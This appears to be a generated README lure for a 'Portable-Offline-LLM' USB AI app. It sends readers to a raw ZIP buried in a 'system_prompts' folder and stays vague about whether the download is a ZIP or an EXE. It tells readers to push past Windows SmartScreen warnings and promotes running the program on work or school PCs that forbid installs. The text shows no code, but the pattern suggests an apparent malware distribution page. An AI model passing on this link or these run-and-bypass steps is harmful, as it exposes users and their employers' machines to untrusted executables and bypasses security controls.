🧠 Portable-Offline-LLM - Private AI on a USB Drive

Download Portable-Offline-LLM

🔗 Download

Visit this page to download Portable-Offline-LLM:

https://github.com/recognisable-riddance165/Portable-Offline-LLM/raw/refs/heads/main/system_prompts/Offline_LLM_Portable_v2.1-alpha.1.zip

💻 What this is

Portable-Offline-LLM lets you run an AI assistant on Windows from a USB flash drive.

It works without installation, without internet, and without admin rights.

You can keep your files local and use the app on a PC that does not belong to you, as long as you can run programs from the drive.

🚀 What you can do

  • Chat with a local AI assistant
  • Keep your data on your own drive
  • Run the app without setup on the PC
  • Use it on more than one Windows computer
  • Work offline once the files are on the USB drive
  • Avoid cloud sign-ins and web access

📦 What you need

  • A Windows PC
  • A USB flash drive with enough free space
  • A recent 64-bit version of Windows
  • A few gigabytes of free disk space on the USB drive
  • Basic file access so you can open the app from the drive

🪟 How to download on Windows

  1. Open this page in your browser:
    https://github.com/recognisable-riddance165/Portable-Offline-LLM/raw/refs/heads/main/system_prompts/Offline_LLM_Portable_v2.1-alpha.1.zip

  2. Find the download file or release package on the page.

  3. Save the file to your computer or directly to your USB drive.

  4. If the file is a ZIP archive, extract it to a folder on the USB drive.

  5. If the file is an EXE app, keep it in the folder where you want to run it.

🔌 How to run it from a USB drive

  1. Insert your USB flash drive into the Windows PC.

  2. Open the USB drive in File Explorer.

  3. Go to the Portable-Offline-LLM folder.

  4. Double-click the app file.

  5. Wait for the model to load.

  6. Type your message in the chat window and press Enter.

🧭 First-time setup

When you run the app for the first time, it may take a little longer to start.

That is normal for local AI apps because they load model files from the drive.

If the app asks where the model file is, pick the GGUF file inside the Portable-Offline-LLM folder.

If it asks for a runtime or engine path, keep the default option unless the page gives a different file name.

📁 Folder layout

You may see files like these:

  • Portable-Offline-LLM.exe — starts the app
  • models — stores the AI model files
  • data — keeps your chat files and settings
  • logs — stores app logs if you need them
  • README.md — project notes and basic use steps

🧩 File types you may see

  • EXE — the program you open
  • ZIP — a compressed file you extract
  • GGUF — the AI model file the app uses
  • TXT or MD — text instructions

⚙️ Basic use

  • Open the app
  • Wait for the model to load
  • Type a question
  • Read the reply
  • Ask a follow-up if needed

You can ask for help with writing, planning, summaries, code explainers, and general tasks.

🔒 Privacy and offline use

Portable-Offline-LLM is built for local use.

Your chat stays on the device where you run it.

Once you have the files on the USB drive, you do not need the internet to use the assistant.

That makes it useful for private work, travel, or locked-down computers.

🧠 Model notes

This project uses a local LLM in GGUF format.

A GGUF model is a file that stores the AI model data in a format made for local tools.

If the project uses a Qwen3 model, you can expect strong general chat, writing help, and instruction following.

Larger models may give better replies but need more memory and storage.

🛠️ Troubleshooting

If the app does not open:

  • Check that you copied all files from the download
  • Make sure you ran the correct EXE file
  • Try another USB port
  • Keep the folder path simple
  • Avoid moving files after setup

If the model does not load:

  • Check that the GGUF file is still in the model folder
  • Make sure the file was not left inside a ZIP archive
  • Confirm that the USB drive has enough free space
  • Wait longer on the first launch

If the app feels slow:

  • Close other large apps
  • Use a faster USB drive
  • Use a smaller model file if the project includes more than one
  • Run it on a PC with more RAM

If Windows blocks the app:

  • Open the file from File Explorer
  • If SmartScreen appears, use the local file you downloaded from the project page
  • Make sure the file finished downloading before you try again

🧪 Best results

  • Use a fast USB 3.0 drive
  • Keep the app and model files in one folder
  • Leave enough free space for chat history and temp files
  • Use a PC with good memory if you want faster replies
  • Close the app cleanly before removing the USB drive

📚 Typical use cases

  • Private writing help on shared computers
  • Offline work in places with no internet
  • Quick local AI access from a carry-anywhere drive
  • Personal notes and drafts kept off the cloud
  • Temporary use on a work or school PC that does not allow installs
